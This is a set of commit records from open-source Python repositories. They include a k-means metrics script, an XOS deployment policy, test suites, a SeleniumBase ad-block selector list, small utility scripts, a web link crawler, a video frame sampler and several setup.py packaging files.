        print(a)
        print("SUCCESS: Connection was made using TLS1.2")
    except(ssl.SSLError, urllib.error.URLError) as e:
        print("ERROR: {}".format(e.reason))
| mit | Python | |
f2044b0771f278c2a0de5cb69783b264a2d2363d | Add clustering metrics calculator file. | theovasi/browsewiki,theovasi/browsewiki,theovasi/browsewiki | cluster_metrics.py | cluster_metrics.py | "Calculates Silhouette coefficient and Calinski-Harabaz index for a kmeans model."
import os, sys
import argparse, joblib
from sklearn import metrics
def cluster_metrics(data_file_path):
    """Compute clustering quality metrics for a saved k-means model.

    Loads ``kmodel.txt`` from *data_file_path*, picks the vector space the
    clustering was run on (``topic_space.txt`` when present, otherwise the
    Tf-Idf matrix), computes the Silhouette coefficient and the
    Calinski-Harabaz index, and writes both to ``metric_results.txt`` in
    the same directory.

    Args:
        data_file_path: Directory holding the serialized model and matrices.
    """
    # os.path.join replaces fragile string concatenation with '/'.
    kmodel_path = os.path.join(data_file_path, 'kmodel.txt')
    if not os.path.exists(kmodel_path):
        print('No k-means model file found.')
        # NOTE(review): exits with status 0 even though this is an error
        # condition; kept for backward compatibility.
        sys.exit(0)
    kmodel = joblib.load(kmodel_path)
    # If no topic_space.txt file exists, the clustering was performed on the
    # Tf-Idf matrix so load that instead.
    topic_path = os.path.join(data_file_path, 'topic_space.txt')
    if os.path.exists(topic_path):
        vector_space = joblib.load(topic_path)
        print('Calculating metrics for topic vector space.')
    else:
        vector_space = joblib.load(os.path.join(data_file_path,
                                                'tfidf_sparse.txt'))
        print('Calculating metrics for Tf-Idf vector space.')
    silhouette = metrics.silhouette_score(vector_space, kmodel.labels_,
                                          metric='euclidean')
    calhar = metrics.calinski_harabaz_score(vector_space.toarray(),
                                            kmodel.labels_)
    with open(os.path.join(data_file_path, 'metric_results.txt'),
              'w+') as output:
        output.write('Silhouette coefficient: ' + str(silhouette))
        # Fix: the label was previously misspelled "Caliski-Harabaz".
        output.write('\nCalinski-Harabaz index: ' + str(calhar))
if __name__ == '__main__':
    # Command line interface: one positional argument, the data directory.
    arg_parser = argparse.ArgumentParser('Parses data file path.')
    arg_parser.add_argument('data_file_path', type=str,
                            help='The file to the data directory.')
    parsed = arg_parser.parse_args()
    cluster_metrics(parsed.data_file_path)
| mit | Python | |
3b182032ae092560b2423e77f657ec0794ce38e6 | Add new users to all deployments | cboling/xos,wathsalav/xos,cboling/xos,open-cloud/xos,opencord/xos,xmaruto/mcord,open-cloud/xos,wathsalav/xos,opencord/xos,wathsalav/xos,opencord/xos,zdw/xos,jermowery/xos,jermowery/xos,zdw/xos,zdw/xos,cboling/xos,wathsalav/xos,open-cloud/xos,xmaruto/mcord,zdw/xos,jermowery/xos,xmaruto/mcord,xmaruto/mcord,cboling/xos,cboling/xos,jermowery/xos | planetstack/model_policies/model_policy_User.py | planetstack/model_policies/model_policy_User.py | from core.models import *
def handle(user):
    """Ensure `user` has a UserDeployments record at every deployment.

    Both admins and normal users are currently given accounts at all
    deployments; the commented-out line preserves the original intent of
    restricting normal users to their site's deployments.
    """
    # Bug fix: defaultdict was used without being imported anywhere in this
    # module (only `from core.models import *` is in scope).
    from collections import defaultdict
    deployments = Deployment.objects.all()
    # Map each user to the deployments they already have an account at.
    # (The original also built an unused per-site lookup and an unused
    # duplicate `all_deployments` query; both removed.)
    user_deploy_lookup = defaultdict(list)
    for user_deployment in UserDeployments.objects.all():
        user_deploy_lookup[user_deployment.user].append(user_deployment.deployment)
    if user.is_admin:
        # admins should have an account at all deployments
        expected_deployments = deployments
    else:
        # normal users should have an account at their site's deployments;
        # for now they are added to all deployments instead:
        # expected_deployments = site_deploy_lookup[user.site]
        expected_deployments = deployments
    for expected_deployment in expected_deployments:
        if user not in user_deploy_lookup or \
           expected_deployment not in user_deploy_lookup[user]:
            # add new record
            ud = UserDeployments(user=user, deployment=expected_deployment)
            ud.save()
7e7bd440a1e3f585464df3458070528d0100d456 | Add helper to run requested Python script | gdb/pyseidon,gdb/pyseidon | pyseidon/handlers/__init__.py | pyseidon/handlers/__init__.py | import pyseidon
import sys
def handle_script():
    """Run a pyseidon master whose handler executes a client-supplied script."""
    import runpy
    """
    Allow the client to run an arbitrary Python script.
    Here's sample usage:
    ```
    def expensive_setup():
        ...
    if __name__ == '__main__':
        expensive_setup()
        import pyseidon.handlers
        pyseidon.handlers.handle_script()
    ```
    """
    # NOTE: the string above is not a real docstring (it follows a
    # statement); it is kept in place unchanged.
    def handler():
        # Presumably sys.argv holds the client's arguments here, with
        # argv[0] being the script path — TODO confirm against pyseidon.
        if len(sys.argv) < 1:
            print >>sys.stderr, 'Must provide path to Python script to execute'
            sys.exit(1)
        # Execute the requested script as if it were run as __main__.
        runpy.run_path(sys.argv[0], run_name='__main__')
    master = pyseidon.Pyseidon()
    master.run(handler)
| mit | Python | |
c022bffe21dce408cd348e69796da4dcc573af23 | Add tests for errors.py | Akrog/gcs-client | tests/test_errors.py | tests/test_errors.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
test_errors
----------------------------------
Tests errors classes.
"""
import unittest
import mock
from gcs_client import errors as gcs_errors
class TestErrors(unittest.TestCase):
def test_init(self):
"""Test init providing all arguments."""
http = gcs_errors.Http(mock.sentinel.message, mock.sentinel.code)
self.assertEqual(mock.sentinel.message, http.message)
self.assertEqual(mock.sentinel.code, http.code)
def test_str(self):
"""Test str conversio."""
message = 'message'
code = 'code'
http = gcs_errors.Http(message, code)
self.assertIn(message, str(http))
self.assertIn(code, str(http))
def test_str_no_message(self):
"""Test str conversio with missing message."""
code = 'code'
http = gcs_errors.Http(code=code)
self.assertIn(code, str(http))
self.assertNotIn(':', str(http))
def test_check_classes(self):
"""Test that error classes are dynamically created."""
for code, (cls_name, cls_parent) in gcs_errors.http_errors.items():
cls = getattr(gcs_errors, cls_name)
self.assertEqual(code, cls.code)
self.assertIn(cls_parent, cls.__bases__)
def test_create_http_exception(self):
"""Test that create_http_exception creates specific exceptions."""
for code, (cls_name, cls_parent) in gcs_errors.http_errors.items():
exc = gcs_errors.create_http_exception(code, mock.sentinel.message)
self.assertEqual(code, exc.code)
self.assertTrue(isinstance(exc, getattr(gcs_errors, cls_name)))
self.assertEqual(mock.sentinel.message, exc.message)
def test_create_http_exception_str_code(self):
"""Test create_http_exception creates exceptions from str codes."""
for code, (cls_name, cls_parent) in gcs_errors.http_errors.items():
exc = gcs_errors.create_http_exception(str(code),
mock.sentinel.message)
self.assertEqual(code, exc.code)
self.assertTrue(isinstance(exc, getattr(gcs_errors, cls_name)))
self.assertEqual(mock.sentinel.message, exc.message)
def test_create_http_exception_non_int_code(self):
"""Test create_http_exception creates exceptions from non int codes."""
for code, (cls_name, cls_parent) in gcs_errors.http_errors.items():
exc = gcs_errors.create_http_exception('code',
mock.sentinel.message)
self.assertEqual('code', exc.code)
self.assertIs(gcs_errors.Http, type(exc))
self.assertEqual(mock.sentinel.message, exc.message)
def test_create_http_exception_non_specific(self):
"""Test create_http_exception creates non specific exceptions."""
# Code 1 is an int but not in http_errors -> plain Http instance.
exc = gcs_errors.create_http_exception(1, mock.sentinel.message)
self.assertEqual(1, exc.code)
self.assertIs(gcs_errors.Http, type(exc))
self.assertEqual(mock.sentinel.message, exc.message)
| apache-2.0 | Python | |
87172e2b9e0143cf164dc34c26c69fc4eda7dd1e | Add initial block list for ad_block functionality | seleniumbase/SeleniumBase,mdmintz/seleniumspot,mdmintz/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/seleniumspot,mdmintz/SeleniumBase | seleniumbase/config/ad_block_list.py | seleniumbase/config/ad_block_list.py | """
For use with SeleniumBase ad_block functionality.
Usage:
On the command line:
"pytest SOME_TEST.py --ad_block"
From inside a test:
self.ad_block()
If using the command line version, the ad_block functionality gets
activated after "self.wait_for_ready_state_complete()" is called,
which is always run after page loads, unless changed in "settings.py".
Using ad_block will slow down test runs a little. (Use only if necessary.)
Format: A CSS Selector that's ready for JavaScript's querySelectorAll()
"""
# Each entry is a CSS selector fed to JavaScript's querySelectorAll() (see
# module docstring above); matched elements are treated as ads.
AD_BLOCK_LIST = [
# Attribute-based selectors: aria labels, data-* hooks, known ad hosts.
'[aria-label="Ad"]',
'[class^="sponsored-content"]',
'[data-ad-details*="Advertisement"]',
'[data-native_ad*="placement"]',
'[data-provider="dianomi"]',
'[data-type="ad"]',
'[data-track-event-label*="-taboola-"]',
'[href*="doubleclick.net/"]',
'[id*="-ad-"]',
'[id*="_ads_"]',
'[id*="AdFrame"]',
'[id^="ad-"]',
'[id^="outbrain_widget"]',
'[id^="taboola-"]',
'[id="dianomiRightRail"]',
'[src*="smartads."]',
'[src*="ad_nexus"]',
'[src*="/ads/"]',
'[data-dcm-click-tracker*="/adclick."]',
'[data-google-query-id^="C"]',
# Element.class / element.tag selectors for common ad containers.
'div.ad-container',
'div.ad_module',
'div.ad-subnav-container',
'div.ad-wrapper',
'div.data-ad-container',
'div.l-ad',
'div.right-ad',
'div.wx-adWrapper',
'img.img_ad',
'link[href*="/adservice."]',
'script[src*="/adservice."]',
'script[src*="/pagead/"]',
'section.dianomi-ad',
]
| mit | Python | |
c7cdb6750ac3a927fe773f7d86be94d24df937b1 | Add Choice module | Didero/DideRobot | commands/Choice.py | commands/Choice.py | import random
from CommandTemplate import CommandTemplate
# IRC bot command: picks one option from a user-supplied list.
# NOTE(review): leading indentation was lost in this extract; code kept verbatim.
class Command(CommandTemplate):
# Command words that trigger this module.
triggers = ['choice', 'choose']
helptext = "Helps you make a choice between options in a comma-separated list"
def execute(self, message):
"""
:type message: IrcMessage.IrcMessage
"""
replytext = None
if message.messagePartsLength == 0:
replytext = "My choice would be to provide me with some choices, preferably separated by commas"
else:
# Prefer comma-separated options; fall back to whitespace-split words.
choices = []
if ',' in message.message:
choices = message.message.split(',')
else:
choices = message.messageParts
if len(choices) == 1:
replytext = "Ooh, that's a tough one. I'd go with the first option, seeing as there is only one"
else:
possibleReplies = ["{}", "Hmm, I'd go with {}", "Out of those, {} sounds the least bad", "{}, obviously",
"Let's go with... {}. No wait! No, yeah, that one", "I don't know! *rolls dice* Seems you should go for {}",
"Pick {0}, pick {0}!", "Eh, {} will do", "Why not {}?", "The first one! The last one! {}!"]
#Pick a random reply sentence, and then add in a random choice from the provided list, enclosed in quotes
replytext = random.choice(possibleReplies).format("'" + random.choice(choices).strip() + "'")
message.bot.sendMessage(message.source, replytext)
0a4bc484b465b2cfa0d763026a161ab7a92a3abb | Create squreRootBi.py | crazyhottommy/some-unorganized-old-scripts,crazyhottommy/some-unorganized-old-scripts,crazyhottommy/some-unorganized-old-scripts | python_scripts/squreRootBi.py | python_scripts/squreRootBi.py | def squreRootBi(x, epsilon):
'''assume x>=0 and epsilon > 0
Return y s.t y*y is within epsilon of x'''
# Bisection search for the square root (Python 2 script; prints are
# debug traces of each iteration).
assert x>= 0, 'x must be non-negative, not' + str(x)
assert epsilon > 0 , 'epsilon must be positive, not' + str(epsilon)
low = 0
high= max (x, 1.0) # incase x is smaller than 1, 0.5**2=0.25
guess=(low+high)/2.0
count=1
# Halve the [low, high] interval until guess**2 is within epsilon of x,
# giving up after 100 iterations.
while abs(guess **2 -x ) > epsilon and count <= 100:
print 'low:', low, 'high:',high, 'guess:', guess
if guess **2 < x:
low=guess
else:
high=guess
guess=(low+high)/2.0
count+=1
# If the loop exited by exhausting the budget, count is 101 and this fires.
assert count <= 100, 'iteration count exceeded'
print 'Bi method, num.interations:', count, 'Estimate:', guess
return guess
| mit | Python | |
645316b5583a69c834c3f6800007eadf2c6d8fed | test ra package | postatum/ra,brandicted/ra,ramses-tech/ra | tests/test_ra.py | tests/test_ra.py |
def test_api(mocker, test_raml):
"""ra.api() wraps a RAML definition + app into an APISuite."""
# 'mocker' (pytest-mock) and 'test_raml' are pytest fixtures; the app is
# mocked since only the returned suite type is asserted here.
import ra
raml = test_raml('simple')
app = mocker.Mock()
api = ra.api(raml, app)
assert isinstance(api, ra.dsl.APISuite)
| apache-2.0 | Python | |
2d4f09fe8c31aa2b996e71565292d5ef249986c7 | Add a small tool to answer questions like "Why does target A depend on target B". | yitian134/chromium,yitian134/chromium,ropik/chromium,ropik/chromium,ropik/chromium,ropik/chromium,gavinp/chromium,yitian134/chromium,gavinp/chromium,adobe/chromium,gavinp/chromium,yitian134/chromium,gavinp/chromium,yitian134/chromium,adobe/chromium,adobe/chromium,gavinp/chromium,ropik/chromium,yitian134/chromium,ropik/chromium,ropik/chromium,adobe/chromium,adobe/chromium,gavinp/chromium,adobe/chromium,yitian134/chromium,gavinp/chromium,ropik/chromium,adobe/chromium,yitian134/chromium,gavinp/chromium,ropik/chromium,adobe/chromium,gavinp/chromium,adobe/chromium,gavinp/chromium,yitian134/chromium,adobe/chromium,adobe/chromium,yitian134/chromium | tools/gyp-explain.py | tools/gyp-explain.py | #!/usr/bin/env python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Prints paths between gyp targets.
"""
import json
import os
import sys
import time
from collections import deque
def usage():
"""Print command-line usage for this tool (Python 2 print statement)."""
print """\
Usage:
tools/gyp-explain.py chrome_dll gtest#
"""
def GetPath(graph, fro, to):
  """Given a graph in (node -> list of successor nodes) dictionary format,
  yields all paths from |fro| to |to|, starting with the shortest."""
  # Breadth-first traversal; every queue entry carries the full path taken
  # so far, which costs memory but keeps the code trivial for a dev tool.
  # NOTE(review): no visited-set, so a cyclic graph yields forever.
  pending = deque()
  pending.append((fro, []))
  while pending:
    node, path_so_far = pending.popleft()
    if node == to:
      yield path_so_far + [node]
    for successor in graph[node]:
      pending.append((successor, path_so_far + [node]))
def MatchNode(graph, substring):
"""Given a dictionary, returns the key that matches |substring| best. Exits
if there's not one single best match."""
# "best" here means: exactly one key contains the substring; zero or
# several matches abort the whole program via sys.exit(1).
candidates = []
for target in graph:
if substring in target:
candidates.append(target)
if not candidates:
print 'No targets match "%s"' % substring
sys.exit(1)
if len(candidates) > 1:
print 'More than one target matches "%s": %s' % (
substring, ' '.join(candidates))
sys.exit(1)
return candidates[0]
def Main(argv):
"""Load dump.json, resolve the two target substrings, print all paths."""
# Check that dump.json exists and that it's not too old.
dump_json_dirty = False
try:
st = os.stat('dump.json')
file_age_s = time.time() - st.st_mtime
if file_age_s > 2 * 60 * 60:
print 'dump.json is more than 2 hours old.'
dump_json_dirty = True
except IOError:
print 'dump.json not found.'
dump_json_dirty = True
if dump_json_dirty:
print 'Run'
print '  GYP_GENERATORS=dump_dependency_json build/gyp_chromium'
print 'first, then try again.'
sys.exit(1)
# dump.json holds the target -> dependencies mapping produced by gyp.
g = json.load(open('dump.json'))
if len(argv) != 3:
usage()
sys.exit(1)
fro = MatchNode(g, argv[1])
to = MatchNode(g, argv[2])
paths = list(GetPath(g, fro, to))
if len(paths) > 0:
print 'These paths lead from %s to %s:' % (fro, to)
for path in paths:
print ' -> '.join(path)
else:
print 'No paths found from %s to %s.' % (fro, to)
if __name__ == '__main__':
Main(sys.argv)
| bsd-3-clause | Python | |
5e32d890fe0762163f1edab6672df91e7d461d8f | Check if a given sequence of moves for a robot is circular or not (py) | MayankAgarwal/GeeksForGeeks | check-if-a-given-sequence-of-moves-for-a-robot-is-circular-or-not.py | check-if-a-given-sequence-of-moves-for-a-robot-is-circular-or-not.py | from operator import add
import math
# Python 2 script: a move sequence is "circular" if the robot ends where it
# started.  G = one step forward, L/R = turn 90 degrees left/right.
moves = raw_input("Enter the moves: ")
start_position = [0,0]
current_position = [0,0]
'''
heading = [1,90] - 1 step North
[1, -90] - 1 step South
[1,0] - East
[1,360] - West
'''
# heading[0] is the step size, heading[1] the accumulated angle in degrees.
heading = [1,0]
for move in moves:
if move.upper() == "G":
angle = heading[1]
step = heading[0]
# round() snaps cos/sin of multiples of 90 degrees to -1/0/1.
move_coord = [ round(step*math.cos(math.radians(angle))), round(step*math.sin(math.radians(angle))) ]
# Python 2 map() returns a list here; element-wise position update.
current_position = map(add, current_position, move_coord)
elif move.upper() == "L":
heading = map(add, heading, [0, 90])
elif move.upper() == "R":
heading = map(add, heading, [0, -90])
if start_position == current_position:
print "Given sequence of moves is circular"
else:
print "Given sequence of moves is NOT circular"
7e1113801b04c7cc7300ee0cdebea25d0ea190a6 | Create scrap.py | alangfiles/graphscraper | scrap.py | scrap.py | import urllib2
import json
from bs4 import BeautifulSoup
# Python 2 crawler: starting from base_url+starting_page, follow ".action"
# links (up to 10 discovered pages) and emit a JSON-ish string of the link
# graph.  NOTE(review): the output is built by string concatenation and is
# not valid JSON (trailing commas, unescaped URLs) -- confirm consumers.
base_url = ""
starting_page = ""
json_export = '{ "pages": [ \n'
index = 0
url_list = []
url_list.append(base_url+starting_page)
urls_tested = []
# url_list grows while being iterated, which is how newly found pages get
# crawled in the same loop.
for url in url_list:
page_json = '{ "page" : \n { "url": "' + url + '", '
urls_tested.append(url) #add this url as 'tested'
req = urllib2.Request(url)
site_html = urllib2.urlopen(req).read()
soup = BeautifulSoup(site_html)
# create a list of <a href> links
all_links = soup.findAll("a", href=True)
page_json += '"links": ['
#filter all the links
filtered_links = []
for link in all_links:
if ".action" in link["href"]: # all the .action links
filtered_links.append(link['href'])
if link["href"] not in url_list and base_url+link["href"] not in urls_tested and index < 10: # add to url_list
url_list.append(base_url+link["href"])
index = index + 1
elif "http" in link["href"]: # all the outside links
filtered_links.append(link['href'])
for link in filtered_links:
page_json += '{ "link": "' + link + '"},\n '
page_json += "]}\n},"
json_export += page_json
json_export += ']}'
print json_export
| mit | Python | |
2eec69e94538d16adea4b6c0193a4cb9cd68cfd6 | Add utility to dump pairs of frames from a list of videos | achalddave/frame-pairs,achalddave/frame-pairs | dump_frame_pairs.py | dump_frame_pairs.py | """Dump pairs of frames from videos."""
import argparse
import logging
import random
import sys
import os
from collections import namedtuple
import cv2
# Command-line interface and module-level constants/types for the frame
# dumper.  args is parsed at import time, so this module is script-only.
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('video_list',
default=None,
help='New-line separated file containing paths to videos.')
parser.add_argument('output',
default=None,
help='Directory to output frames to.')
args = parser.parse_args()
logging.getLogger().setLevel(logging.INFO)
# How many (start, end) pairs to sample per video, and how many seconds
# apart the two frames of a pair are.
NUM_PAIRS_PER_VIDEO = 5
PAIR_DISTANCE_SECONDS = 3
class VideoOpenFailedException(Exception):
pass
# Frame: a decoded image plus its timestamp in seconds.
Frame = namedtuple('Frame', ['seconds', 'frame'])
FramePair = namedtuple('FramePair', ['start', 'end'])
def sample_frame_pairs(video_path, num_pairs_per_video, pair_distance_seconds):
"""Sample num_pairs_per_video (start, end) FramePairs from a video, with
the two frames of each pair pair_distance_seconds apart.

Raises VideoOpenFailedException if OpenCV cannot open the file.
NOTE(review): if the reported frame count exceeds what read() actually
delivers, the captured_frames lookups below raise KeyError -- confirm
behaviour on truncated videos.
"""
video = cv2.VideoCapture(video_path)
if not video.isOpened():
raise VideoOpenFailedException("Couldn't open video {}".format(
video_path))
frame_rate = video.get(cv2.cv.CV_CAP_PROP_FPS)
num_frames = int(video.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
# Sample frame pair indices.
pair_distance_frames = int(pair_distance_seconds * frame_rate)
start_indices = random.sample(
range(num_frames - pair_distance_frames), num_pairs_per_video)
start_indices.sort()
end_indices = [start + pair_distance_frames for start in start_indices]
frames_to_capture = set(start_indices + end_indices)
captured_frames = dict() # Map frame indices to frames.
# Capture required frames.
current_frame_index = 0
while video.isOpened():
return_value, frame = video.read()
if return_value != True:
break
if current_frame_index in frames_to_capture:
captured_frames[current_frame_index] = frame
current_frame_index += 1
# Create FramePair objects.
frame_pairs = []
for start_index, end_index in zip(start_indices, end_indices):
start_seconds = start_index / frame_rate
start_frame = Frame(seconds=start_seconds,
frame=captured_frames[start_index])
end_seconds = end_index / frame_rate
end_frame = Frame(seconds=end_seconds,
frame=captured_frames[end_index])
frame_pairs.append(FramePair(start_frame, end_frame))
return frame_pairs
def main():
"""Sample frame pairs from every listed video and write them to disk as
<output>/<video>/pair-<start>-<end>/{start,end}.png."""
videos = []
with open(args.video_list) as f:
videos.extend(f.read().strip().split('\n'))
# Create output directory; exit if it exists and is not empty.
if os.path.isdir(args.output):
if os.listdir(args.output):
logging.fatal(("Output directory '{}' already exists and is "
"not empty.").format(args.output))
sys.exit(1)
else:
os.mkdir(args.output)
for video_path in videos:
try:
logging.info('Reading video {}'.format(video_path))
frame_pairs = sample_frame_pairs(video_path, NUM_PAIRS_PER_VIDEO,
PAIR_DISTANCE_SECONDS)
except VideoOpenFailedException as e:
# Unreadable videos are logged and skipped, not fatal.
logging.error(e)
continue
video_basename = os.path.splitext(os.path.basename(video_path))[0]
video_output_dir = '{}/{}'.format(args.output, video_basename)
os.mkdir(video_output_dir)
# Write frame pairs to disk
for i, (start_frame, end_frame) in enumerate(frame_pairs):
pair_output_dir = '{}/pair-{}-{}'.format(video_output_dir,
int(start_frame.seconds),
int(end_frame.seconds))
if os.path.isdir(pair_output_dir): continue
os.mkdir(pair_output_dir)
start_image = '{}/start.png'.format(pair_output_dir)
end_image = '{}/end.png'.format(pair_output_dir)
cv2.imwrite(start_image, start_frame.frame)
cv2.imwrite(end_image, end_frame.frame)
if __name__ == '__main__':
main()
| mit | Python | |
4c7536d6f2c5c8b6f1c76a8fb6af062f3cfebf6c | add setup.py | blcook223/dummy_data | setup.py | setup.py | from setuptools import setup
# Packaging metadata for the dummy_data package (single package, no deps).
setup(name='dummy_data',
version='0.0.0',
description='Generate dummy data ',
url='http://github.com/blcook223/dummy_data',
author='Benjamin Cook',
author_email='benjamin.l.cook@gmail.com',
license='MIT',
packages=['dummy_data'],
zip_safe=False)
| mit | Python | |
b253d58d9feb614e00bdff3b41e087eafd0bfc5d | Bump version. | subhaoi/kioskuser,bradleyg/django-ajaximage,subhaoi/kioskuser,subhaoi/kioskuser,bradleyg/django-ajaximage,bradleyg/django-ajaximage | setup.py | setup.py | import os
from setuptools import setup

# Read the package README for PyPI's long_description; a context manager
# replaces the previous open()/read()/close() sequence so the handle is
# closed even if read() raises.
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as f:
    readme = f.read()

setup(
    name='django-ajaximage',
    version='0.1.17',
    description='Add ajax image upload functionality with a progress bar to file input fields within Django admin. Images are optionally resized.',
    long_description=readme,
    author="Bradley Griffiths",
    author_email='bradley.griffiths@gmail.com',
    url='https://github.com/bradleyg/django-ajaximage',
    packages=['ajaximage'],
    include_package_data=True,
    install_requires=[
        'Django',
        'Pillow',
    ],
    zip_safe=False,
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Web Environment',
        'Framework :: Django',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
    ],
)
| import os
# Previous revision of the django-ajaximage setup script (version
# 0.1.16-rohanza); kept verbatim as the record's old contents.
from setuptools import setup
f = open(os.path.join(os.path.dirname(__file__), 'README.md'))
readme = f.read()
f.close()
setup(
name='django-ajaximage',
version='0.1.16-rohanza',
description='Add ajax image upload functionality with a progress bar to file input fields within Django admin. Images are optionally resized.',
long_description=readme,
author="Bradley Griffiths",
author_email='bradley.griffiths@gmail.com',
url='https://github.com/bradleyg/django-ajaximage',
packages=['ajaximage'],
include_package_data=True,
install_requires=[
'Django',
'Pillow',
],
zip_safe=False,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
],
)
| mit | Python |
4f4a30e9d0be7b282be6a5378d67b9d5cad047bc | Add classdata for bayes | kevinwilde/WildeBot,kevinwilde/WildeBot,kevinwilde/WildeBot,kevinwilde/WildeBot | bayes/classdata.py | bayes/classdata.py | # Name: Kevin Wilde (kjw731)
# Date: May 23, 2016
# Description: Sentiment Analysis with Naive Bayes Classifiers
#
# All group members were present and contributing during all work on this
# project. (I worked alone.)
#
# Class to hold class data. Necessary to define in separate module because
# I will be pickling instances of this class
class ClassData:
    """Per-class accumulator pickled during Naive Bayes training (see the
    module header: instances are defined here so they can be pickled)."""

    def __init__(self):
        """Used to keep track of data for each class in training"""
        # How many training files have been seen for this class.
        self.num_files = 0
        # feature -> count mapping (filled in by the trainer -- presumably
        # token counts; confirm against the training code).
        self.feature_dict = {}
        # Running total of the counts stored in feature_dict.
        self.sum_of_all_features = 0
| mit | Python | |
4e396326c2c053713bc6699ff572cd96669fa041 | Add setup.py | ludios/tagmyrebase,ludios/tagmyrebase | setup.py | setup.py | #!/usr/bin/env python3
from distutils.core import setup
# Packaging metadata: installs the single 'tagmyrebase' script.
setup(
name="tagmyrebase",
version="2.0.0",
description="Utility to tag HEAD and the upstream commit after a rebase",
scripts=["tagmyrebase"],
)
| mit | Python | |
af07e75b3f13970b16b8e8c8509e4e83a2dbfd18 | Add setup.py | epayet/playlist_kreator,epayet/playlist_kreator | setup.py | setup.py | # Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
from playlist_kreator import VERSION
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
# Runtime dependencies come straight from requirements.txt (one per line).
with open('requirements.txt') as requirements_file:
requirements = requirements_file.read().split('\n')
setup(
name='playlist-kreator',
version=VERSION,
description='Create playlists easily from a list of artists, using their top songs.',
long_description=long_description,
url='https://github.com/epayet/playlist_kreator',
author='Emmanuel payet',
author_email='contact@emmanuel-payet.me',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: End Users/Desktop',
'Topic :: Internet',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='music googlemusic playlist',
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
install_requires=requirements,
)
| mit | Python | |
247c57b08f9f7baf8d0fb71ca323ac60005f280f | Initialize setup file for microservice | chrswt/vicarious-microservice | setup.py | setup.py | from setuptools import find_packages, setup
# Packaging metadata for the Pig Latin microservice project.
setup(name='pig_latin_microservice',
version='1.0',
description='Vicarious Pig Latin Microservice Project',
author='Christopher Tham',
platforms=['any'],
license='MIT',
packages=find_packages())
| mit | Python | |
5c09bc5cd1611c81c70db7248a45fcbb10c61d71 | add setup.py | robertchase/spindrift,robertchase/spindrift | setup.py | setup.py | from setuptools import find_packages
from distutils.core import setup
# Packaging metadata; packages are auto-discovered, tests excluded.
setup(
name='spindrift',
version='1.0.0',
packages=find_packages(exclude=['tests']),
description='A rest framework',
long_description="""
Documentation
-------------
You can see the project and documentation at the `GitHub repo <https://github.com/robertchase/spindrift>`_
""",
author='Bob Chase',
url='https://github.com/robertchase/spindrift',
license='MIT',
)
| mit | Python | |
d976725de01d2691c42b796d30c69c42d2934c07 | Update setup.py | blabla1337/skf-flask,akaasjager/skf-flask,dpnl87/skf-flask,dpnl87/skf-flask,blabla1337/skf-flask,blabla1337/skf-flask,akaasjager/skf-flask,dpnl87/skf-flask,blabla1337/skf-flask,akaasjager/skf-flask,blabla1337/skf-flask,akaasjager/skf-flask | setup.py | setup.py | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# Packaging metadata for OWASP SKF, release 1.3.14 (pinned deps below).
setup(name='owasp-skf',
version='1.3.14',
description='The OWASP Security Knowledge Framework',
url='https://github.com/blabla1337/skf-flask',
author='Glenn ten Cate, Riccardo ten Cate',
author_email='gtencate@schubergphilis.com, r.tencate77@gmail.com',
license='AGPLV3',
packages=['skf'],
# trying to add files...
include_package_data = True,
long_description="""\
The Security Knowledge Framework is an fully open-source Python-Flask web-application.
It is an expert system application that uses OWASP Application Security Verification Standard
""",
install_requires=['markdown','BeautifulSoup', 'python-docx','lxml==3.4.2', 'cryptography==0.8.2', 'pyOpenSSL', 'requests', 'importlib','flask-bcrypt'],
dependency_links= [
'https://github.com/mitsuhiko/flask/tarball/master#egg=Flask-owasp'
],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Framework :: Flask",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Topic :: Software Development",
"Topic :: Security",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: Unix",
"Programming Language :: Python :: 2.7",
"License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)",
])
| try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# Previous revision of the SKF setup metadata (version 1.3.12); kept
# verbatim as the record's old contents.
setup(name='owasp-skf',
version='1.3.12',
description='The OWASP Security Knowledge Framework',
url='https://github.com/blabla1337/skf-flask',
author='Glenn ten Cate, Riccardo ten Cate',
author_email='gtencate@schubergphilis.com, r.tencate77@gmail.com',
license='AGPLV3',
packages=['skf'],
# trying to add files...
include_package_data = True,
long_description="""\
The Security Knowledge Framework is an fully open-source Python-Flask web-application.
It is an expert system application that uses OWASP Application Security Verification Standard
""",
